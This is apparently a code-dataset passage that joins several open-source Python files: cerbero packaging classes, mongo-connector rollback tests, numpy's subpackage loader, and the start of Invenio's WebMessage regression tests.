deps += p.recipes_dependencies(use_devel)
return remove_list_duplicates(deps)
def recipes_licenses(self):
return self._list_licenses(self._recipes_files)
def devel_recipes_licenses(self):
licenses = self._list_licenses(self._recipes_files_devel)
for recipe_name, categories in self._recipes_files.iteritems():
# also add development licenses for recipe from which used the
# 'libs' category
if len(categories) == 0 or FilesProvider.LIBS_CAT in categories:
r = self.cookbook.get_recipe(recipe_name)
if recipe_name in licenses:
licenses[recipe_name].update(
r.list_licenses_by_categories(categories))
else:
licenses[recipe_name] = \
r.list_licenses_by_categories(categories)
return licenses
def files_list(self):
files = []
for recipe_name, categories in self._recipes_files.iteritems():
recipe = self.cookbook.get_recipe(recipe_name)
if len(categories) == 0:
rfiles = recipe.dist_files_list()
else:
rfiles = recipe.files_list_by_categories(categories)
files.extend(rfiles)
return sorted(files)
def devel_files_list(self):
files = []
for recipe, categories in self._recipes_files.iteritems():
# only add development files for recipe from which used the 'libs'
# category
if len(categories) == 0 or FilesProvider.LIBS_CAT in categories:
rfiles = self.cookbook.get_recipe(recipe).devel_files_list()
files.extend(rfiles)
for recipe, categories in self._recipes_files_devel.iteritems():
recipe = self.cookbook.get_recipe(recipe)
if not categories:
rfiles = recipe.devel_files_list()
else:
rfiles = recipe.files_list_by_categories(categories)
files.extend(rfiles)
return sorted(files)
def all_files_list(self):
files = self.files_list()
files.extend(self.devel_files_list())
return sorted(files)
def _parse_files(self):
self._recipes_files = {}
for r in self._files:
l = r.split(':')
if self._recipes_files.has_key(l[0]):
self._recipes_files[l[0]] += l[1:]
else:
self._recipes_files[l[0]] = l[1:]
self._recipes_files_devel = {}
for r in self._files_devel:
l = r.split(':')
if self._recipes_files_devel.has_key(l[0]):
self._recipes_files_devel[l[0]] += l[1:]
else:
self._recipes_files_devel[l[0]] = l[1:]
def _list_licenses(self, recipes_files):
licenses = {}
for recipe_name, categories in recipes_files.iteritems():
r = self.cookbook.get_recipe(recipe_name)
# Package.files|files_devel|platform_files|platform_files_devel = \
# [recipe:category]
# => licenses = {recipe_name: {category: category_licenses}}
# Package.files|files_devel|platform_files|platform_files_devel = \
# [recipe]
# => licenses = {recipe_name: {None: recipe_licenses}}
licenses[recipe_name] = r.list_licenses_by_categories(categories)
return licenses
class MetaPackage(PackageBase):
'''
Group of L{cerbero.packages.package.Package} used to build a a modular
installer package.
On Windows it will result in a .msi installer that aggregates
Merge Modules created from a L{cerbero.packages.package.Package}.
On OS X it will result in a MetaPackage that aggreates .pkg packages
created a L{cerbero.packages.package.Package}.
On Linux it will result in in rpm and deb meta-packages, whith the packages
created as dependencies.
@cvar packages: list of packages grouped in this meta package
@type packages: list
@cvar platform_packages: list of platform packages
@type platform_packages: dict
@cvar root_env_var: name of the environment variable with the prefix
@type root_env_var: str
@cvar sdk_version: SDK version. This version will be used for the SDK
versionning and can defer from the installer one.
@type sdk_version: str
@cvar resources_wix_installer: wix installer template file
@type resources_wix_installer: string
@cvar resources_distribution: Distribution XML template file
@type resources_distribution: string
@cvar user_resources: folders included in the .dmg for iOS packages
@type user_resources: list
'''
packages = []
root_env_var = 'CERBERO_SDK_ROOT'
platform_packages = {}
sdk_version = '1.0'
resources_wix_installer = None
resources_distribution = 'distribution.xml'
user_resources = []
def __init__(self, config, store):
PackageBase.__init__(self, config, store)
def list_packages(self):
return [p[0] for p in self.packages]
def recipes_dependencies(self, use_devel=True):
deps = []
for package in self.store.get_package_deps(self.name, True):
deps.extend(package.recipes_dependencies(use_devel))
return remove_list_duplicates(deps)
def files_list(self):
return self._list_files(Package.files_list)
def devel_files_list(self):
return self._list_files(Package.devel_files_list)
def all_files_list(self):
return self._list_files(Package.all_files_list)
def get_wix_upgrade_code(self):
m = self.package_mode
p = self.config.target_arch
return self.wix_upgrade_code[m][p]
def _list_files(self, func):
# for each package, call the function that list files
files = []
for package in self.store.get_package_deps(self.name):
files.extend(func(package))
files.sort()
return files
def __getattribute__(self, name):
if name == 'packages':
attr = PackageBase.__getattribute__(self, name)
ret = attr[:]
platform_attr_name = 'platform_%s' % name
if hasattr(self, platform_attr_name):
platform_attr = PackageBase.__getattribute__(self,
platform_attr_name)
if self.config.target_platform in platform_attr:
platform_list = platform_attr[self.config.target_platform]
ret.extend(platform_list)
return ret
else:
return PackageBase.__getattribute__(self, name)
class SDKPackage(MetaPackage):
'''
Creates an installer for SDK's.
On Windows the installer will add a new enviroment variable set in
root_env_var as well as a new key in the registry so that other installers
depending on the SDK could use them to set their environment easily and
check wether the requirements are met in the pre-installation step.
On OS X, the installer will create the tipical bundle structure used for
OS X Frameworks, creating the 'Versions' and 'Current' directories for
versionning as well as 'Headers' and 'Libraries' linking to the current
version of the framework.
On Linux everything just works without extra hacks ;)
@cvar root_env_var: name of the environment variable with the prefix
@type root_env_var: str
@cvar osx_framework_library: (name, path) of the lib used for the Framework
@type osx_framework_library: tuple
'''
root_env_var = 'CERBERO_SDK_ROOT_%(arch)s'
osx_framework_library = None
def __init__(self, config, store):
MetaPackage.__init__(self, config, store)
def get_root_env_var(self):
return (self.root_env_var % {'arch': self.config.target_arch}).upper()
class InstallerPackage(MetaPackage):
'''
Creates an installer for a target SDK to extend it.
@cvar windows_sdk_reg: name of the required SDK
@type windows_sdk_reg: str
'''
windows_sdk_reg = None
def __init__(self, config, store):
MetaPackage.__init__(self, config, store)
class App(Package):
'''
Create packages for applications.
An App package will not include development files and binaries could
be stripped when required. The App packager will not create a development
version.
On linux it will work in the same way as a MetaPackage, creating a package
with the application's recipe files and adding packages dependencies to be
managed by the distribution's package manager.
On OS X and Windows, the dependencies could be embeded in the installer
itself, creating an Application bundle on OS X and main menu shortcuts on
Windows, relocating the binaries properly.
@cvar app_recipe: Name used for the application
@type app_recipe: str
@cvar app_recipe: recipe that builds the application project
@type app_recipe: str
@cvar deps: list of packages dependencies
@type deps: list
@cvar embed_deps: include dependencies in the final package
@type embed_deps: boolean
@cvar commands: a list of with the application commands. The first will be
used for the main executable
@type command: list
@cvar wrapper: suffix filename for the main executable wrapper
@type wrapper: str
@cvar strip: strip binaries for this package
@type strip: bool
@cvar strip_dirs: directories to strip
@type strip: list
@cvar strip_excludes: files that won't be stripped
@type strip_excludes: list
@cvar resources_info_plist: Info.plist template file
@type resources_info_plist: string
@cvar resources_distribution: Distribution XML template file
@type resources_distribution: Distribution XML template file
@cvar osx_create_dmg: Packages the app in a dmg
@type osx_create_dmg: bool
@cvar osx_create_pkg: Packages the app in a pkg
@type osx_create_pkg: bool
'''
app_name = None
app_recipe = None
embed_deps = True
deps = []
commands = [] # list of tuples ('CommandName', path/to/binary')
wrapper = 'app_wrapper.tpl'
resources_wix_installer = None
strip = False
strip_dirs = ['bin']
strip_excludes = []
resources_info_plist = 'Info.plist'
resources_distribution = 'distribution.xml'
osx_create_dmg = True
osx_create_pkg = True
def __init__(self, config, store, cookbook):
Package.__init__(self, config, store, cookbook)
self._app_recipe = self.cookbook.get_recipe(self.app_recipe)
self.title = self.name
def recipes_dependencies(self, use_devel=True):
deps = []
for dep in self.deps:
package = self.store.get_package(dep)
deps.extend(package.recipes_dependencies(use_devel))
if self.app_recipe is not None:
deps.append(self.app_recipe)
return remove_list_duplicates(deps)
def files_list(self):
# for each package, call the function that list files
files = Package.files_list(self)
if self.embed_deps:
packages_deps = [self.store.get_package(x) for x in self.deps]
for package in packages_deps:
packages_deps.extend(self.store.get_package_deps(package))
packages_deps = list(set(packages_deps))
for package in packages_deps:
files.extend(package.files_list())
# Also include all the libraries provided by the recipes we depend
# on.
for recipe in self.cookbook.list_recipe_deps(self.app_recipe):
files.extend(recipe.libraries())
files.extend(recipe.files_list_by_category(FilesProvider.PY_CAT))
files.extend(recipe.files_list_by_category(FilesProvider.TYPELIB_CAT))
files.extend(self._app_recipe.files_list())
files.sort()
return files
def devel_files_list(self):
return []
def all_files_list(self):
return self.files_list()
def recipes_licenses(self):
# FIXME
return {}
def devel_recipes_licenses(self):
# FIXME
return {}
def get_wix_upgrade_code(self):
m = self.package_mode
p = self.config.target_arch
return self.wix_upgrade_code[m][p]
def get_commands(self):
return self.commands.get(self.config.target_platform, [])
def get_wrapper(self, cmd, wrapper=None):
if self.config.target_platform == Platform.WINDOWS:
platform = 'win'
else:
platform = 'unix'
if wrapper is not None:
wrapper_file = self.relative_path('%s_%s' % (platform, wrapper))
else:
wrapper_file = os.path.join(self.config.data_dir, 'templates',
'%s_%s' % (self.wrapper, platform))
if not os.path.exists(wrapper_file):
return None
with open(wrapper_file, 'r') as f:
content = f.read()
content = content % {'prefix': self.config.prefix,
'py_prefix': self.config.py_prefix,
'cmd': self.config.prefix}
return content
def __getattribute__(self, name):
if name == 'deps':
attr = PackageBase.__getattribute__(self, name)
ret = attr[:]
platform_attr_name = 'platform_%s' % name
if hasattr(self, platform_attr_name):
platform_attr = PackageBase.__getattribute__(self,
platform_attr_name)
if self.config.target_platform in platform_attr:
platform_list = platform_attr[self.config.target_platform]
ret.extend(platform_list)
return ret
else:
return PackageBase.__getattribute__(self, name)
| lgpl-2.1 |
orchardmile/mongo-connector | tests/test_rollbacks.py | 14 | 11412 | """Test Mongo Connector's behavior when its source MongoDB system is
experiencing a rollback.
"""
import os
import sys
import time
from pymongo.read_preferences import ReadPreference
from pymongo import MongoClient
sys.path[0:0] = [""]
from mongo_connector.util import retry_until_ok
from mongo_connector.locking_dict import LockingDict
from mongo_connector.doc_managers.doc_manager_simulator import DocManager
from mongo_connector.oplog_manager import OplogThread
from tests import unittest, STRESS_COUNT
from tests.util import assert_soon
from tests.setup_cluster import ReplicaSet
class TestRollbacks(unittest.TestCase):
def tearDown(self):
self.repl_set.stop()
def setUp(self):
# Create a new oplog progress file
try:
os.unlink("oplog.timestamp")
except OSError:
pass
open("oplog.timestamp", "w").close()
# Start a replica set
self.repl_set = ReplicaSet().start()
# Connection to the replica set as a whole
self.main_conn = self.repl_set.client()
# Connection to the primary specifically
self.primary_conn = self.repl_set.primary.client()
# Connection to the secondary specifically
self.secondary_conn = self.repl_set.secondary.client(
read_preference=ReadPreference.SECONDARY_PREFERRED)
# Wipe any test data
self.main_conn["test"]["mc"].drop()
# Oplog thread
doc_manager = DocManager()
oplog_progress = LockingDict()
self.opman = OplogThread(
primary_client=self.main_conn,
doc_managers=(doc_manager,),
oplog_progress_dict=oplog_progress,
ns_set=["test.mc"]
)
def test_single_target(self):
"""Test with a single replication target"""
self.opman.start()
# Insert first document with primary up
self.main_conn["test"]["mc"].insert({"i": 0})
self.assertEqual(self.primary_conn["test"]["mc"].find().count(), 1)
# Make sure the insert is replicated
secondary = self.secondary_conn
assert_soon(lambda: secondary["test"]["mc"].count() == 1,
"first write didn't replicate to secondary")
# Kill the primary
self.repl_set.primary.stop(destroy=False)
# Wait for the secondary to be promoted
assert_soon(lambda: secondary["admin"].command("isMaster")["ismaster"])
# Insert another document. This will be rolled back later
retry_until_ok(self.main_conn["test"]["mc"].insert, {"i": 1})
self.assertEqual(secondary["test"]["mc"].count(), 2)
# Wait for replication to doc manager
assert_soon(lambda: len(self.opman.doc_managers[0]._search()) == 2,
"not all writes were replicated to doc manager")
# Kill the new primary
self.repl_set.secondary.stop(destroy=False)
# Start both servers back up
self.repl_set.primary.start()
primary_admin = self.primary_conn["admin"]
assert_soon(lambda: primary_admin.command("isMaster")["ismaster"],
"restarted primary never resumed primary status")
self.repl_set.secondary.start()
assert_soon(lambda: retry_until_ok(secondary.admin.command,
'replSetGetStatus')['myState'] == 2,
"restarted secondary never resumed secondary status")
assert_soon(lambda:
retry_until_ok(self.main_conn.test.mc.find().count) > 0,
"documents not found after primary/secondary restarted")
# Only first document should exist in MongoDB
self.assertEqual(self.main_conn["test"]["mc"].count(), 1)
self.assertEqual(self.main_conn["test"]["mc"].find_one()["i"], 0)
# Same case should hold for the doc manager
doc_manager = self.opman.doc_managers[0]
assert_soon(lambda: len(doc_manager._search()) == 1,
'documents never rolled back in doc manager.')
self.assertEqual(doc_manager._search()[0]["i"], 0)
# cleanup
self.opman.join()
def test_many_targets(self):
"""Test with several replication targets"""
# OplogThread has multiple doc managers
doc_managers = [DocManager(), DocManager(), DocManager()]
self.opman.doc_managers = doc_managers
self.opman.start()
# Insert a document into each namespace
self.main_conn["test"]["mc"].insert({"i": 0})
self.assertEqual(self.primary_conn["test"]["mc"].count(), 1)
# Make sure the insert is replicated
secondary = self.secondary_conn
assert_soon(lambda: secondary["test"]["mc"].count() == 1,
"first write didn't replicate to secondary")
# Kill the primary
self.repl_set.primary.stop(destroy=False)
# Wait for the secondary to be promoted
assert_soon(lambda: secondary.admin.command("isMaster")['ismaster'],
'secondary was never promoted')
# Insert more documents. This will be rolled back later
# Some of these documents will be manually removed from
# certain doc managers, to emulate the effect of certain
# target systems being ahead/behind others
secondary_ids = []
for i in range(1, 10):
secondary_ids.append(
retry_until_ok(self.main_conn["test"]["mc"].insert,
{"i": i}))
self.assertEqual(self.secondary_conn["test"]["mc"].count(), 10)
# Wait for replication to the doc managers
def docmans_done():
for dm in self.opman.doc_managers:
if len(dm._search()) != 10:
return False
return True
assert_soon(docmans_done,
"not all writes were replicated to doc managers")
# Remove some documents from the doc managers to simulate
# uneven replication
ts = self.opman.doc_managers[0].get_last_doc()['_ts']
for id in secondary_ids[8:]:
self.opman.doc_managers[1].remove(id, 'test.mc', ts)
for id in secondary_ids[2:]:
self.opman.doc_managers[2].remove(id, 'test.mc', ts)
# Kill the new primary
self.repl_set.secondary.stop(destroy=False)
# Start both servers back up
self.repl_set.primary.start()
primary_admin = self.primary_conn["admin"]
assert_soon(lambda: primary_admin.command("isMaster")['ismaster'],
'restarted primary never resumed primary status')
self.repl_set.secondary.start()
assert_soon(lambda: retry_until_ok(secondary.admin.command,
'replSetGetStatus')['myState'] == 2,
"restarted secondary never resumed secondary status")
assert_soon(lambda:
retry_until_ok(self.primary_conn.test.mc.find().count) > 0,
"documents not found after primary/secondary restarted")
# Only first document should exist in MongoDB
self.assertEqual(self.primary_conn["test"]["mc"].count(), 1)
self.assertEqual(self.primary_conn["test"]["mc"].find_one()["i"], 0)
# Give OplogThread some time to catch up
time.sleep(10)
# Same case should hold for the doc managers
for dm in self.opman.doc_managers:
self.assertEqual(len(dm._search()), 1)
self.assertEqual(dm._search()[0]["i"], 0)
self.opman.join()
def test_deletions(self):
"""Test rolling back 'd' operations"""
self.opman.start()
# Insert a document, wait till it replicates to secondary
self.main_conn["test"]["mc"].insert({"i": 0})
self.main_conn["test"]["mc"].insert({"i": 1})
self.assertEqual(self.primary_conn["test"]["mc"].find().count(), 2)
assert_soon(lambda: self.secondary_conn["test"]["mc"].count() == 2,
"first write didn't replicate to secondary")
# Kill the primary, wait for secondary to be promoted
self.repl_set.primary.stop(destroy=False)
assert_soon(lambda: self.secondary_conn["admin"]
.command("isMaster")["ismaster"])
# Delete first document
retry_until_ok(self.main_conn["test"]["mc"].remove, {"i": 0})
self.assertEqual(self.secondary_conn["test"]["mc"].count(), 1)
# Wait for replication to doc manager
assert_soon(lambda: len(self.opman.doc_managers[0]._search()) == 1,
"delete was not replicated to doc manager")
# Kill the new primary
self.repl_set.secondary.stop(destroy=False)
# Start both servers back up
self.repl_set.primary.start()
primary_admin = self.primary_conn["admin"]
assert_soon(lambda: primary_admin.command("isMaster")["ismaster"],
"restarted primary never resumed primary status")
self.repl_set.secondary.start()
assert_soon(lambda: retry_until_ok(self.secondary_conn.admin.command,
'replSetGetStatus')['myState'] == 2,
"restarted secondary never resumed secondary status")
# Both documents should exist in mongo
assert_soon(lambda: retry_until_ok(
self.main_conn["test"]["mc"].count) == 2)
# Both document should exist in doc manager
doc_manager = self.opman.doc_managers[0]
docs = list(doc_manager._search())
self.assertEqual(len(docs), 2,
"Expected two documents, but got %r" % docs)
self.opman.join()
def test_stressed_rollback(self):
"""Stress test for a rollback with many documents."""
self.opman.start()
c = self.main_conn.test.mc
docman = self.opman.doc_managers[0]
c.insert({'i': i} for i in range(STRESS_COUNT))
assert_soon(lambda: c.count() == STRESS_COUNT)
condition = lambda: len(docman._search()) == STRESS_COUNT
assert_soon(condition, ("Was expecting %d documents in DocManager, "
"but %d found instead."
% (STRESS_COUNT, len(docman._search()))))
primary_conn = self.repl_set.primary.client()
self.repl_set.primary.stop(destroy=False)
new_primary_conn = self.repl_set.secondary.client()
admin = new_primary_conn.admin
assert_soon(
lambda: retry_until_ok(admin.command, "isMaster")['ismaster'])
retry_until_ok(c.insert,
[{'i': str(STRESS_COUNT + i)}
for i in range(STRESS_COUNT)])
assert_soon(lambda: len(docman._search()) == c.count())
self.repl_set.secondary.stop(destroy=False)
self.repl_set.primary.start()
admin = primary_conn.admin
assert_soon(
lambda: retry_until_ok(admin.command, "isMaster")['ismaster'])
self.repl_set.secondary.start()
assert_soon(lambda: retry_until_ok(c.count) == STRESS_COUNT)
assert_soon(condition, ("Was expecting %d documents in DocManager, "
"but %d found instead."
% (STRESS_COUNT, len(docman._search()))))
self.opman.join()
| apache-2.0 |
greenoaktree/MissionPlanner | Lib/site-packages/numpy/_import_tools.py | 87 | 12888 | import os
import sys
__all__ = ['PackageLoader']
class PackageLoader:
def __init__(self, verbose=False, infunc=False):
""" Manages loading packages.
"""
if infunc:
_level = 2
else:
_level = 1
self.parent_frame = frame = sys._getframe(_level)
self.parent_name = eval('__name__',frame.f_globals,frame.f_locals)
parent_path = eval('__path__',frame.f_globals,frame.f_locals)
if isinstance(parent_path, str):
parent_path = [parent_path]
self.parent_path = parent_path
if '__all__' not in frame.f_locals:
exec('__all__ = []',frame.f_globals,frame.f_locals)
self.parent_export_names = eval('__all__',frame.f_globals,frame.f_locals)
self.info_modules = {}
self.imported_packages = []
self.verbose = None
def _get_info_files(self, package_dir, parent_path, parent_package=None):
""" Return list of (package name,info.py file) from parent_path subdirectories.
"""
from glob import glob
files = glob(os.path.join(parent_path,package_dir,'info.py'))
for info_file in glob(os.path.join(parent_path,package_dir,'info.pyc')):
if info_file[:-1] not in files:
files.append(info_file)
info_files = []
for info_file in files:
package_name = os.path.dirname(info_file[len(parent_path)+1:])\
.replace(os.sep,'.')
if parent_package:
package_name = parent_package + '.' + package_name
info_files.append((package_name,info_file))
info_files.extend(self._get_info_files('*',
os.path.dirname(info_file),
package_name))
return info_files
def _init_info_modules(self, packages=None):
"""Initialize info_modules = {<package_name>: <package info.py module>}.
"""
import imp
info_files = []
info_modules = self.info_modules
if packages is None:
for path in self.parent_path:
info_files.extend(self._get_info_files('*',path))
else:
for package_name in packages:
package_dir = os.path.join(*package_name.split('.'))
for path in self.parent_path:
names_files = self._get_info_files(package_dir, path)
if names_files:
info_files.extend(names_files)
break
else:
try:
exec 'import %s.info as info' % (package_name)
info_modules[package_name] = info
except ImportError, msg:
self.warn('No scipy-style subpackage %r found in %s. '\
'Ignoring: %s'\
% (package_name,':'.join(self.parent_path), msg))
for package_name,info_file in info_files:
if package_name in info_modules:
continue
fullname = self.parent_name +'.'+ package_name
if info_file[-1]=='c':
filedescriptor = ('.pyc','rb',2)
else:
filedescriptor = ('.py','U',1)
try:
info_module = imp.load_module(fullname+'.info',
open(info_file,filedescriptor[1]),
info_file,
filedescriptor)
except Exception,msg:
self.error(msg)
info_module = None
if info_module is None or getattr(info_module,'ignore',False):
info_modules.pop(package_name,None)
else:
self._init_info_modules(getattr(info_module,'depends',[]))
info_modules[package_name] = info_module
return
def _get_sorted_names(self):
""" Return package names sorted in the order as they should be
imported due to dependence relations between packages.
"""
depend_dict = {}
for name,info_module in self.info_modules.items():
depend_dict[name] = getattr(info_module,'depends',[])
package_names = []
for name in depend_dict.keys():
if not depend_dict[name]:
package_names.append(name)
del depend_dict[name]
while depend_dict:
for name, lst in depend_dict.items():
new_lst = [n for n in lst if n in depend_dict]
if not new_lst:
package_names.append(name)
del depend_dict[name]
else:
depend_dict[name] = new_lst
return package_names
def __call__(self,*packages, **options):
"""Load one or more packages into parent package top-level namespace.
This function is intended to shorten the need to import many
subpackages, say of scipy, constantly with statements such as
import scipy.linalg, scipy.fftpack, scipy.etc...
Instead, you can say:
import scipy
scipy.pkgload('linalg','fftpack',...)
or
scipy.pkgload()
to load all of them in one call.
If a name which doesn't exist in scipy's namespace is
given, a warning is shown.
Parameters
----------
*packages : arg-tuple
the names (one or more strings) of all the modules one
wishes to load into the top-level namespace.
verbose= : integer
verbosity level [default: -1].
verbose=-1 will suspend also warnings.
force= : bool
when True, force reloading loaded packages [default: False].
postpone= : bool
when True, don't load packages [default: False]
"""
frame = self.parent_frame
self.info_modules = {}
if options.get('force',False):
self.imported_packages = []
self.verbose = verbose = options.get('verbose',-1)
postpone = options.get('postpone',None)
self._init_info_modules(packages or None)
self.log('Imports to %r namespace\n----------------------------'\
% self.parent_name)
for package_name in self._get_sorted_names():
if package_name in self.imported_packages:
continue
info_module = self.info_modules[package_name]
global_symbols = getattr(info_module,'global_symbols',[])
postpone_import = getattr(info_module,'postpone_import',False)
if (postpone and not global_symbols) \
or (postpone_import and postpone is not None):
continue
old_object = frame.f_locals.get(package_name,None)
cmdstr = 'import '+package_name
if self._execcmd(cmdstr):
continue
self.imported_packages.append(package_name)
if verbose!=-1:
new_object = frame.f_locals.get(package_name)
if old_object is not None and old_object is not new_object:
self.warn('Overwriting %s=%s (was %s)' \
% (package_name,self._obj2repr(new_object),
self._obj2repr(old_object)))
if '.' not in package_name:
self.parent_export_names.append(package_name)
for symbol in global_symbols:
if symbol=='*':
symbols = eval('getattr(%s,"__all__",None)'\
% (package_name),
frame.f_globals,frame.f_locals)
if symbols is None:
symbols = eval('dir(%s)' % (package_name),
frame.f_globals,frame.f_locals)
symbols = filter(lambda s:not s.startswith('_'),symbols)
else:
symbols = [symbol]
if verbose!=-1:
old_objects = {}
for s in symbols:
if s in frame.f_locals:
old_objects[s] = frame.f_locals[s]
cmdstr = 'from '+package_name+' import '+symbol
if self._execcmd(cmdstr):
continue
if verbose!=-1:
for s,old_object in old_objects.items():
new_object = frame.f_locals[s]
if new_object is not old_object:
self.warn('Overwriting %s=%s (was %s)' \
% (s,self._obj2repr(new_object),
self._obj2repr(old_object)))
if symbol=='*':
self.parent_export_names.extend(symbols)
else:
self.parent_export_names.append(symbol)
return
def _execcmd(self,cmdstr):
""" Execute command in parent_frame."""
frame = self.parent_frame
try:
exec (cmdstr, frame.f_globals,frame.f_locals)
except Exception,msg:
self.error('%s -> failed: %s' % (cmdstr,msg))
return True
else:
self.log('%s -> success' % (cmdstr))
return
def _obj2repr(self,obj):
""" Return repr(obj) with"""
module = getattr(obj,'__module__',None)
file = getattr(obj,'__file__',None)
if module is not None:
return repr(obj) + ' from ' + module
if file is not None:
return repr(obj) + ' from ' + file
return repr(obj)
def log(self,mess):
if self.verbose>1:
print >> sys.stderr, str(mess)
def warn(self,mess):
if self.verbose>=0:
print >> sys.stderr, str(mess)
def error(self,mess):
if self.verbose!=-1:
print >> sys.stderr, str(mess)
def _get_doc_title(self, info_module):
""" Get the title from a package info.py file.
"""
title = getattr(info_module,'__doc_title__',None)
if title is not None:
return title
title = getattr(info_module,'__doc__',None)
if title is not None:
title = title.lstrip().split('\n',1)[0]
return title
return '* Not Available *'
def _format_titles(self,titles,colsep='---'):
display_window_width = 70 # How to determine the correct value in runtime??
lengths = [len(name)-name.find('.')-1 for (name,title) in titles]+[0]
max_length = max(lengths)
lines = []
for (name,title) in titles:
name = name[name.find('.')+1:]
w = max_length - len(name)
words = title.split()
line = '%s%s %s' % (name,w*' ',colsep)
tab = len(line) * ' '
while words:
word = words.pop(0)
if len(line)+len(word)>display_window_width:
lines.append(line)
line = tab
line += ' ' + word
else:
lines.append(line)
return '\n'.join(lines)
def get_pkgdocs(self):
""" Return documentation summary of subpackages.
"""
import sys
self.info_modules = {}
self._init_info_modules(None)
titles = []
symbols = []
for package_name, info_module in self.info_modules.items():
global_symbols = getattr(info_module,'global_symbols',[])
fullname = self.parent_name +'.'+ package_name
note = ''
if fullname not in sys.modules:
note = ' [*]'
titles.append((fullname,self._get_doc_title(info_module) + note))
if global_symbols:
symbols.append((package_name,', '.join(global_symbols)))
retstr = self._format_titles(titles) +\
'\n [*] - using a package requires explicit import (see pkgload)'
if symbols:
retstr += """\n\nGlobal symbols from subpackages"""\
"""\n-------------------------------\n""" +\
self._format_titles(symbols,'-->')
return retstr
class PackageLoaderDebug(PackageLoader):
def _execcmd(self,cmdstr):
""" Execute command in parent_frame."""
frame = self.parent_frame
print 'Executing',`cmdstr`,'...',
sys.stdout.flush()
exec (cmdstr, frame.f_globals,frame.f_locals)
print 'ok'
sys.stdout.flush()
return
if int(os.environ.get('NUMPY_IMPORT_DEBUG','0')):
PackageLoader = PackageLoaderDebug
| gpl-3.0 |
jmartinm/invenio-master | modules/webmessage/lib/webmessage_regression_tests.py | 16 | 14143 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""WebMessage Regression Test Suite."""
__revision__ = "$Id$"
from invenio.testutils import InvenioTestCase
from invenio.config import CFG_SITE_URL
from invenio.testutils import make_test_suite, run_test_suite, \
test_web_page_content, merge_error_messages
from invenio import webmessage
from invenio.config import CFG_SITE_LANG
from invenio.webmessage_dblayer import CFG_WEBMESSAGE_STATUS_CODE, \
check_quota, \
count_nb_messages, \
create_message, \
datetext_default, \
delete_all_messages, \
delete_message_from_user_inbox, \
get_all_messages_for_user, \
get_gids_from_groupnames, \
get_groupnames_like, \
get_nb_new_messages_for_user, \
get_nb_readable_messages_for_user, \
get_nicknames_like, \
get_nicks_from_uids, \
get_uids_from_emails, \
get_uids_from_nicks, \
get_uids_members_of_groups, \
send_message, \
set_message_status, \
user_exists
class WebMessageWebPagesAvailabilityTest(InvenioTestCase):
"""Check WebMessage web pages whether they are up or not."""
def test_your_message_pages_availability(self):
"""webmessage - availability of Your Messages pages"""
baseurl = CFG_SITE_URL + '/yourmessages/'
_exports = ['', 'display', 'write', 'send', 'delete', 'delete_all',
'display_msg']
error_messages = []
for url in [baseurl + page for page in _exports]:
error_messages.extend(test_web_page_content(url))
if error_messages:
self.fail(merge_error_messages(error_messages))
return
class WebMessageSendingAndReceivingMessageTest(InvenioTestCase):
"""Check sending and receiving message throught WebMessage"""
def test_sending_message(self):
"""webmessage - send and receive a message"""
# juliet writes the message to romeo
webmessage.perform_request_send(6,
msg_to_user="romeo",
msg_to_group="",
msg_subject="Hi romeo",
msg_body="hello romeo how are you?",
ln=CFG_SITE_LANG)
# it is verified that romeo received the message
result = get_all_messages_for_user(5)
self.assertEqual("Hi romeo", result[0][3])
self.assertEqual("juliet", result[0][2])
webmessage.perform_request_delete_msg(5, result[0][0], ln=CFG_SITE_LANG)
def test_setting_message_status(self):
"""webmessage - status from "new" to "read" """
# juliet writes the message to romeo
webmessage.perform_request_send(6,
msg_to_user="romeo",
msg_to_group="",
msg_subject="Hi romeo",
msg_body="hello romeo how are you?",
ln=CFG_SITE_LANG)
msgid = get_all_messages_for_user(5)[0][0]
# status is changed
set_message_status(5, msgid, 'R')
msgstatus = get_all_messages_for_user(5)[0][5]
self.assertEqual(msgstatus, 'R')
webmessage.perform_request_delete_msg(5, msgid, ln=CFG_SITE_LANG)
def test_getting_nb_new_msg(self):
"""webmessage - count the nb of new message"""
delete_all_messages(5)
# juliet writes the message to romeo
webmessage.perform_request_send(6,
msg_to_user="romeo",
msg_to_group="",
msg_subject="Hi romeo",
msg_body="hello romeo how are you?",
ln=CFG_SITE_LANG)
self.assertEqual(get_nb_new_messages_for_user(5), 1)
def test_getting_nb_readable_messages(self):
"""webmessage - get the nb of readable messages"""
delete_all_messages(5)
# juliet writes the message to romeo
webmessage.perform_request_send(6,
msg_to_user="romeo",
msg_to_group="",
msg_subject="Hi romeo",
msg_body="hello romeo how are you?",
ln=CFG_SITE_LANG)
msgid = get_all_messages_for_user(5)[0][0]
# status is changed
set_message_status(5, msgid, 'R')
self.assertEqual(get_nb_readable_messages_for_user(5), 1)
webmessage.perform_request_delete_msg(5, msgid, ln=CFG_SITE_LANG)
def test_getting_all_messages_for_user(self):
"""webmessage - get all message for user"""
delete_all_messages(5)
# juliet writes 3 messages to romeo
webmessage.perform_request_send(6,
msg_to_user="romeo",
msg_to_group="",
msg_subject="Hi romeo",
msg_body="hello romeo how are you?",
ln=CFG_SITE_LANG)
webmessage.perform_request_send(6,
msg_to_user="romeo",
msg_to_group="",
msg_subject="Hi romeo",
msg_body="hello romeo how are you?",
ln=CFG_SITE_LANG)
webmessage.perform_request_send(6,
msg_to_user="romeo",
msg_to_group="",
msg_subject="Hi romeo",
msg_body="hello romeo how are you?",
ln=CFG_SITE_LANG)
self.assertEqual(len(get_all_messages_for_user(5)), 3)
delete_all_messages(5)
def test_count_nb_message(self):
"""webmessage - count the number of messages"""
delete_all_messages(5)
# juliet writes 3 messages to romeo
webmessage.perform_request_send(6,
msg_to_user="romeo",
msg_to_group="",
msg_subject="Hi romeo",
msg_body="hello romeo how are you?",
ln=CFG_SITE_LANG)
webmessage.perform_request_send(6,
msg_to_user="romeo",
msg_to_group="",
msg_subject="Hi romeo",
msg_body="hello romeo how are you?",
ln=CFG_SITE_LANG)
webmessage.perform_request_send(6,
msg_to_user="romeo",
msg_to_group="",
msg_subject="Hi romeo",
msg_body="hello romeo how are you?",
